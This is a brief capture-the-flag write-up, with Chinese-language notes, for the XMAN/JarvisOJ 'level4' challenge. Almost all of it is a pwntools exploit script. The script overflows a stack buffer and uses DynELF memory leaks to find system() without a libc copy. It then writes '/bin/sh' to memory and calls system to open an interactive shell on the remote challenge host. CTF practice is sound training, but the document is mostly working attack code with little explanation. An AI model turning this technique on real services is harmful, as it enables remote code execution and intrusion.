[XMAN]level4
nc pwn2.jarvisoj.com 9880
level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0
无libc,使用DynELF
exp如下:
from pwn import * def leak(address): payload = b'a' * 140 + p32(0x8048340) + p32(0x804844B) + p32(1) + p32(address) + p32(4) io.send(payload) addr = io.recv(4) return addr #io = process('./level4') #io = gdb.debug('./level4', 'b *0x804844B') io = remote("pwn2.jarvisoj.com", 9880) d = DynELF(leak, elf = ELF("./level4")) system_addr = d.lookup("system", "libc") info("system_addr:" + str(hex(system_addr))) payload = b'a' * 140 + p32(0x8048310) + p32(0x804844B) + p32(0) + p32(0x804A100) + p32(8) io.send(payload) sleep(0.5) io.send(b'/bin/sh\0') payload = b'a' * 140 + p32(system_addr) + p32(0x804844B) + p32(0x804A100) sleep(0.5) io.send(payload) io.interactive()